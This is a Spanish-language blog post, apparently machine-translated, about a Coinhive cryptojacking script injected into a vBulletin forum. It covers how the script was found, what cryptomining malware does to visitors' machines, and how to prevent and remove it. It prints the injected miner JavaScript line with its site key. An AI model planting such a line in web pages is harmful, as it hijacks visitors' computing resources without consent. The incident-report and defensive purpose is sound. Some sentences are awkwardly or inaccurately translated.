Cómo eliminar el script de criptografía de Coinhive desde su sitio web

Normalmente visito el foro todos los días y no lo había visto el día anterior. Así que supongo que esto sucedió en algún momento durante la noche, mi tiempo, cuando estaba durmiendo.

Utilizo el software vBulletin para el foro, y se actualizó a la última versión. Además, esto fue bastante sorprendente para nosotros, ya que el dominio TheWindowsClub.com usa Sucuri Web Antivirus & Firewall para protegerse de las amenazas y ataques web en línea.

El software de seguridad para PC detuvo el script malicioso en mi computadora con Windows 10 Comprobé con otros navegadores como Chrome & Edge, y los resultados fueron los mismos.

Después de hacer clic derecho en la página web del foro y verificar el código fuente, descubrí que era un script malicioso de CryptoMiner de CoinHive.

Este es el malicioso Javascript de Coinhive que había ingresado en mi código de foro:

var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

De todos modos, lo primero que hice fue tomar el foro abajo e informar a Sucuri.

La gente de Sucuri limpió el foro del guión de Coinhive que había sido empujado a mi foro en unas pocas horas, y todo estaba bien.

¿Qué es CoinHive?

Coinhive ofrece un minero de JavaScript para la criptomoneda Monero que puede insertar en su sitio web y utilizar la CPU de las computadoras de los visitantes del sitio web para extraer las monedas por usted.

Esto se llama Criptobúsqueda . Implica el secuestro de los navegadores de los usuarios para la minería de criptomonedas. Algunos propietarios de sitios web pueden usarlo ellos mismos para ganar dinero, pero en nuestro caso, se lo inyectaron.

Cuando un usuario accede al sitio infectado, el JavaScript de Coinhive ejecuta y explota Monero utilizando los recursos de la CPU del usuario. Esto puede llevar a la aceleración de la CPU y al bloqueo inesperado del sistema de la máquina de la víctima.

Ahora, si su navegador está infectado, verá que la utilización de sus recursos aumentará. Cierra el navegador y se abrirá. El usuario puede notar que su máquina se está calentando, el ventilador funciona rápidamente o la batería se está agotando rápidamente.

Le pedí a mi colega Saurabh Mukhekar que visitara mi foro usando su Mac y vea qué sucedió. ¡Bien, su computadora Mac también se vio afectada cuando abrió el foro con Safari! Es uno de esos usuarios inteligentes de Mac OSX que usa un software antivirus para su Mac. Su antivirus Avast para Mac detuvo con éxito la ejecución de la secuencia de comandos maliciosos.

Said Saurabh,

El malware CoinHive no solo secuestra una PC con Windows, sino también la Mac, ya que es una infección Javascript basada en el navegador. Es bueno no creer en el mito de que los Mac no necesitan un software antivirus, de lo contrario mi máquina se habría infectado y mi Mac habría seguido generando monedas para otra persona.

Evite que CoinHive infecte su sitio web

1. No use plantillas o complementos NULL en su sitio web / foro.
2. Mantenga su CMS actualizado a la última versión.
3. Actualice su software de hosting regularmente (PHP, Base de datos, etc.).
4. Proteja su sitio web con proveedores de seguridad web como Sucuri, Cloudflare, Wordfence, etc.
5. Tome precauciones básicas para proteger su blog.

Eliminación de minero de CoinHive del sitio web

Primero, debe ser el webmaster del sitio web infectado - o tiene credenciales administrativas que le dan acceso a todos los archivos del sitio web.

Ahora cuando su antivirus detecta la infección CoinHive, haga clic derecho en la página web y seleccione Ver código fuente. Luego presione Ctrl + F y busque "CoinHive".

Una vez que haya identificado la ubicación del código malicioso, necesita ver su posición: ¿dónde se encuentra? Ahora necesita eliminarlo manualmente. Para hacer esto, necesitas un poco de conocimiento de codificación de tu plataforma. Tendrá que ubicar el / los archivo / s infectado / s y eliminarlo manualmente del script anterior. Si no está seguro, solicite a un experto que lo haga. Como utilizamos Sucuri, les permitimos que lo hagan.

Una vez hecho esto, borre el servidor y la memoria caché del navegador. Si está utilizando un complemento de caché o dice MaxCDN, borre también esos cachés.

Protéjase contra los scripts de criptografía

La tecnología de Cryptocurrencies & Blockchain se está apoderando del mundo. Está creando un impacto en la economía global y también está causando disrupciones tecnológicas. Todos han comenzado a enfocarse en un mercado tan lucrativo, y esto incluye a los piratas informáticos de sitios web también. A medida que aumentan los retornos, deberíamos esperar que tales tecnologías sean mal utilizadas. Ese es el lado oscuro de cualquier tecnología emergente.

Lo que podemos hacer es tomar las mejores precauciones posibles en todo momento. Además de utilizar un buen software de seguridad, use una extensión de Chrome o Firefox que impida que los sitios web utilicen su CPU para extraer Cryptocurrency, o mejor aún, utilice Anti-WebMiner que detendrá los ataques de Cryptojacking Mining Script modificando su archivo Hosts. Funciona en todos los navegadores. Si usted es un usuario de Mac, obtenga un software antivirus para su computadora también.

Como precaución abundante, si alguna vez siente que ha visitado un sitio infectado, sería una buena idea borrar su navegador. guarde en caché y escanee su máquina con su software antivirus y AdwCleaner.

¡Manténgase a salvo, manténgase alerta!